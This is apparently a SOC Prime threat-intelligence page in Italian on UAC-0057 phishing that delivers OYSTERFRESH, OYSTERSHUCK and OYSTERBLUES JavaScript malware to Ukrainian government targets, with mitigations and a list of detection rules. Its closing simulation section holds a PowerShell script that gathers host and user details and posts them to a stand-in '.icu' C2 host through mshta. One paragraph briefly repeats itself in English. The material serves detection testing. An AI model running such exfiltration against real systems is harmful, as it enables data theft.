SOC Prime Bias: Medio

22 May 2026 12:56 UTC

UAC-0057 Aggiorna il Suo Toolkit con OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES

Author Photo
SOC Prime Team linkedin icon Segui
UAC-0057 Aggiorna il Suo Toolkit con OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sommario

CERT-UA ha segnalato una campagna di phishing mirata alle organizzazioni governative ucraine. Le email contengono allegati PDF che reindirizzano i destinatari ad archivi ZIP che trasportano file JavaScript dannosi noti come OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES. Una volta eseguito, il malware raccoglie informazioni di sistema e le invia tramite richieste HTTP POST, con l’opzione di recuperare successivamente un componente Cobalt Strike. L’infrastruttura di supporto è nascosta dietro Cloudflare e fa ampio uso di .icu domini.

Indagine

L’analisi di CERT-UA ha identificato i campioni di JavaScript dannosi, i metodi di decodifica su cui si basano, inclusi inversione di stringa, ROT13 e decodifica URL, e le modifiche al registro utilizzate per mantenere la persistenza. Gli investigatori hanno anche documentato diversi artefatti di file e percorsi Windows associati alla catena di infezione. L’analisi della rete ha collegato l’attività all’infrastruttura di hosting protetta da Cloudflare. Il rapporto osserva inoltre la possibile consegna successiva di un Cobalt Strike beacon. .icu hosting infrastructure. The report further notes the possible follow-on delivery of a Cobalt Strike beacon.

Mitigazione

Le organizzazioni dovrebbero limitare l’esecuzione di wscript.exe per gli utenti standard, limitare l’esecuzione di PowerShell e JavaScript e monitorare le chiavi Run del registro elencate per cambiamenti sospetti. Dovrebbe essere utilizzato il filtraggio web per bloccare .icu domini e, ove opportuno, gli intervalli IP correlati a Cloudflare associati alla campagna. I difensori dovrebbero anche applicare controlli di minimo privilegio e prevenire l’esecuzione automatica di binari sconosciuti.

Risposta

I team di sicurezza dovrebbero creare rilevamenti per i nomi di file identificati, le chiavi di registro e il traffico HTTP POST in uscita verso i domini noti. La caccia dovrebbe coprire anche il possibile payload Cobalt Strike, inclusi il CSBEACON DLL, e qualsiasi attività pianificata nominata MicrosoftEdgeUpdateTaskMachine. Le indagini sugli endpoint dovrebbero raccogliere alberi di processi per tracciare la catena di decodifica ed esecuzione di JavaScript.

Flusso di Attacco

Rilevamenti

Punti di Persistenza Possibili [ASEPs – Software/NTUSER Hive] (via registry_event)

Team SOC Prime
22 maggio 2026

Estensione File Sospetta Aggiunta alle Chiavi Run [ASEPs] (via registry_event)

Team SOC Prime
22 maggio 2026

Estrazione Archivio Direttamente dal Client di Posta (via process_creation)

Team SOC Prime
22 maggio 2026

Esecuzione da Archivio ZIP [7zip] (via process_creation)

Team SOC Prime
22 maggio 2026

Esecuzione da Archivio RAR [WinRAR] (via process_creation)

Team SOC Prime
22 maggio 2026

LOLBAS WScript / CScript (via process_creation)

Team SOC Prime
22 maggio 2026

LOLBAS RunDLL32 (via cmdline)

Team SOC Prime
22 maggio 2026

File Estratti Sospetti da un Archivio (via file_event)

Team SOC Prime
22 maggio 2026

Attività Pianificata Sospetta (via audit)

Team SOC Prime
22 maggio 2026

Controllo e Comando Sospetto tramite Richiesta DNS di Dominio di Primo Livello (TLD) Insolito (via dns)

Team SOC Prime
22 maggio 2026

IOC (HashSha256) da rilevare: Toolkit aggiornato UAC-0057: OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES Parte 2

Regole AI SOC Prime
22 maggio 2026

IOC (HashSha256) da rilevare: Toolkit aggiornato UAC-0057: OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES Parte 1

Regole AI SOC Prime
22 maggio 2026

IOC (HashSha1) da rilevare: Toolkit aggiornato UAC-0057: OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES

Regole AI SOC Prime
22 maggio 2026

IOC (HashMd5) da rilevare: Toolkit aggiornato UAC-0057: OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES Parte 2

Regole AI SOC Prime
22 maggio 2026

IOC (HashMd5) da rilevare: Toolkit aggiornato UAC-0057: OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES Parte 1

Regole AI SOC Prime
22 maggio 2026

IOC (SourceIP) da rilevare: Toolkit aggiornato UAC-0057: OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES

Regole AI SOC Prime
22 maggio 2026

IOC (DestinationIP) da rilevare: Toolkit aggiornato UAC-0057: OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES

Regole AI SOC Prime
22 maggio 2026

Rilevamento di Esfiltrazione OYSTERBLUES tramite HTTP POST a Domini .icu [Connessione di Rete Windows]

Regole AI SOC Prime
22 maggio 2026

Rilevamento di Esecuzione JavaScript Dannoso tramite wscript.exe [Creazione del Processo Windows]

Regole AI SOC Prime
22 maggio 2026

Esecuzione della Simulazione

Prerequisito: Il Controllo di Prevolo della Telemetria e del Baseline deve essere stato superato.

Motivazione: Questa sezione dettaglia l’esatta esecuzione della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione riflettono direttamente le TTP identificate e producono l’esatta telemetria prevista dalla logica di rilevamento.

  • Narrativa e Comandi dell’Attacco:
    L’avversario utilizza un binario Windows firmato (mshta.exe) per eseguire un piccolo payload JavaScript che raccoglie informazioni di sistema e le esfiltra tramite un HTTP POST a un dominio “*.icu” malevolo controllato dal server C2. Questo approccio “living‑off‑the‑land” evita di sollevare allarmi AV mentre genera l’evento firewall esatto che la regola monitora (POST + “.icu”).

  • Script di Test di Regressione:

    # Simulazione di esfiltrazione in stile OYSTERBLUES
    # 1. Codifica informazioni di sistema minime in JSON
    $info = @{
        hostname = $env:COMPUTERNAME
        user     = $env:USERNAME
        os       = (Get-CimInstance -ClassName Win32_OperatingSystem).Caption
    } | ConvertTo-Json -Compress
    
    # 2. Scrivi un file HTML temporaneo che esegue un JS fetch POST
    $htmlPath = "$env:TEMPexfil.html"
    $js = @"
      var data = '$info';
      fetch('http://malicious-c2.abc.icu/collect', {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: data
      });
    "@
    Set-Content -Path $htmlPath -Value "<script>$js</script>" -Encoding ASCII
    
    # 3. Esegui tramite mshta (esecuzione proxy binaria firmata)
    Start-Process -FilePath "$env:SystemRootSystem32mshta.exe" -ArgumentList "`"$htmlPath`""
    
    # 4. Dai tempo alla richiesta di completarsi, quindi pulisci
    Start-Sleep -Seconds 5
    Remove-Item -Path $htmlPath -Force
  • Comandi di Pulizia:

    # Assicurati che qualsiasi processo mshta residuo sia terminato
    Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Rimuovi eventuali file temporanei residui (se presenti)
    $tempFiles = Get-ChildItem -Path $env:TEMP -Filter "exfil.html"
    foreach ($file in $tempFiles) { Remove-Item $file.FullName -Force }